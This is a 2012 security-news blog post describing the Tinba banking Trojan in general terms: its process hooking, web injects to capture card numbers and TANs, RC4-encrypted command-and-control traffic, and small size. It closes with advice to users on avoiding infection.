Thursday, May 31, 2012

Tinba Banking Trojan Proves Size Doesn't Matter When it Comes to Malware

Trojan HorseIt’s often said that good things come in small packages. Apparently the same rings true for very, very bad things.

Researchers over at CSIS Security have discovered what they describe as the world’s smallest banking Trojan, which they’ve named “Tinba” – short for Tiny Banker.

Upon infection, Tinba will hook itself into a variety of running processes including explorer.exe and svchost.exe, along with major browser processes like firefox.exe and iexplore.exe.

Whenever a user visits one of the targeted banking sites, Tinba will manipulate the page by injecting pages or forms to trick the end-user into supplying sensitive financial information like a credit card number or transaction authentication number (TAN).

The list of financial websites targeted by Tinba is said to be very small, but it’s important to note that the malware can inject insecure elements from external sites/servers into a supposedly secure session (HTTPS).

Like other banking Trojans, Tinba uses a RC4 encryption algorithm when communicating with its command & control servers (C&C). Four C&C domains are hardcoded within the malware – serving as a “phone home” list for Tinba to run through should any of the domains fail to respond. The last thing the attackers would want to do is lose track of their prey.

All of this is done with 20KB worth of code, free of any packing or advanced encryption and proof that data pilfering malware doesn’t require a large file size. Unfortunately, a smaller file size typically means a lower antivirus detection rate.

Be careful what files you download and be sure to keep your operating system and antivirus software up-to-date to minimize your chances of infection. And keep a sharp eye out for any suspicious activity when using banking websites (such as unusual requests for confidential information and the like).

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

No comments:

Post a Comment